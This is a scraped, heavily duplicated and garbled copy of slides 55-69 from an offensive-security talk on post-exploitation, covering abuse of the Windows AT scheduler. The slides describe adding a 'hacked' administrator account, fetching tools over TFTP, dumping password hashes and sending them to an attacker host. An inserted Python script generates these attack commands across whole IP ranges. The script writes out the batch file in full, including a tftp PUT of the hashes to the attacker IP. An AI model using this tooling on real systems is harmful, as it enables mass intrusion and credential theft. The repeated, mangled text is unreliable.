Page 55: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts

• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack

Slide 65

Massive Automation

• MassNetUse – Establish NetBIOS session credentials on a range of hosts

• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings

• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts
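A dry-run planner for the AT flow on slides 60, 61 and 65, added here as an example; it is not the authors' AtAbuse tool. It parses the target's `net time` answer, computes the +1 / +2 minute AT times, writes out the e.bat the slides describe and loops the whole thing over a host range. The sample `net time` output, the US-locale date layout it tries first, the dumper.exe name and the credentials are constructed assumptions, and nothing is executed.

```python
"""Dry-run planner for an AT-based remote 'shell', in the AtAbuse style: read the
target's clock, schedule a batch file one and two minutes ahead, repeat per host.
Added example code, not the authors' tool; nothing here executes anything."""
import ipaddress
import re
from datetime import datetime, timedelta

# Constructed sample of what `net time` prints for a host on a US-locale box.
SAMPLE_NET_TIME = (
    "Current time at \\\\192.168.1.1 is 3/14/2008 12:00 PM\r\n"
    "\r\n"
    "The command completed successfully.\r\n"
)

_NET_TIME_RE = re.compile(r"^Current time at \\\\\S+ is (.+?)\s*$", re.MULTILINE)
# Date layouts to try: the output is locale dependent (assumption: US layout first).
_TIME_FORMATS = ("%m/%d/%Y %I:%M %p", "%m/%d/%Y %H:%M", "%d/%m/%Y %H:%M")


def parse_net_time(output):
    """Extract the target's clock from `net time` output as a naive datetime."""
    m = _NET_TIME_RE.search(output)
    if not m:
        raise ValueError("no 'Current time at' line in net time output")
    stamp = m.group(1)
    for fmt in _TIME_FORMATS:
        try:
            return datetime.strptime(stamp, fmt)
        except ValueError:
            continue
    raise ValueError("unrecognised time format: %r" % stamp)


def schedule_time(target_now, minutes_ahead):
    """HH:MM for AT, a whole number of minutes past the target's clock.

    AT only has minute granularity and `net time` reports no seconds, so the
    real clock may already be up to 59 s past target_now. Anything less than a
    full minute ahead risks a time that is already past, which AT silently
    schedules for the next day. Crossing midnight is fine for the same reason.
    """
    if minutes_ahead < 1:
        raise ValueError("schedule at least one full minute ahead")
    when = target_now.replace(second=0, microsecond=0) + timedelta(minutes=minutes_ahead)
    return when.strftime("%H:%M")


def build_batch(target, attacker_ip, dumper="dumper.exe"):
    """e.bat as the slides describe it: add a local admin, fetch a hash dumper,
    push the hashes back in a file named after the target's IP.
    dumper.exe is a placeholder (assumption) for whatever dumping tool is used."""
    lines = [
        "@echo off",
        "net user hacked hacked /add",
        "net localgroup administrators hacked /add",
        "tftp -i %s GET %s" % (attacker_ip, dumper),
        "%s > hashes.txt" % dumper,
        # tftp PUT source [destination]: the copy arrives named by target IP
        "tftp -i %s PUT hashes.txt %s.txt" % (attacker_ip, target),
    ]
    return "\r\n".join(lines) + "\r\n"


def plan_host(target, attacker_ip, username, password, net_time_output):
    """The operator's command lines for one host, in order."""
    now = parse_net_time(net_time_output)
    fetch_at = schedule_time(now, 1)  # +1 min: pull e.bat over TFTP
    run_at = schedule_time(now, 2)    # +2 min: a minute for the transfer, then run
    return [
        "net use \\\\%s\\ipc$ %s /user:%s" % (target, password, username),
        "net time \\\\%s" % target,
        'at \\\\%s %s "tftp -i %s GET e.bat"' % (target, fetch_at, attacker_ip),
        "at \\\\%s %s e.bat" % (target, run_at),
    ]


def plan_range(cidr, attacker_ip, username, password, get_net_time):
    """AtAbuse-style loop over a range. get_net_time(host) returns the text that
    `net time` produced for that host; it is a stub in this dry run."""
    plans = {}
    for host in ipaddress.ip_network(cidr, strict=False).hosts():
        host = str(host)
        try:
            plans[host] = plan_host(host, attacker_ip, username, password,
                                    get_net_time(host))
        except ValueError as err:
            # No scheduler, no session or an unreadable clock: note it and move on
            # rather than stall a run over thousands of hosts.
            plans[host] = ["rem skipped %s: %s" % (host, err)]
    return plans


if __name__ == "__main__":
    demo = plan_range("192.168.1.0/30", "10.0.0.5", "admin", "Passw0rd",
                      lambda host: SAMPLE_NET_TIME)
    for host, cmds in demo.items():
        print("\n".join(cmds))
    print(build_batch("192.168.1.1", "10.0.0.5"))
```

The two-minute gap between the tftp job and the e.bat job is the slides' own spacing: the download gets a full scheduler tick before the batch file is needed. Hosts whose Schedule service is stopped, or whose clock cannot be read, are recorded and skipped so one dead box does not hold up a range.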

Slide 66

• DEMOS

Slide 67

• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
  – Thanks to
    • All the people from the offensivecomputing, nologin and uninformed IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work

Slide 69

• Questions?

• Presentation available at www.offensivecomputing.net

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 56: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 57: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 58: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 59: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 60: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 61: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 62: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
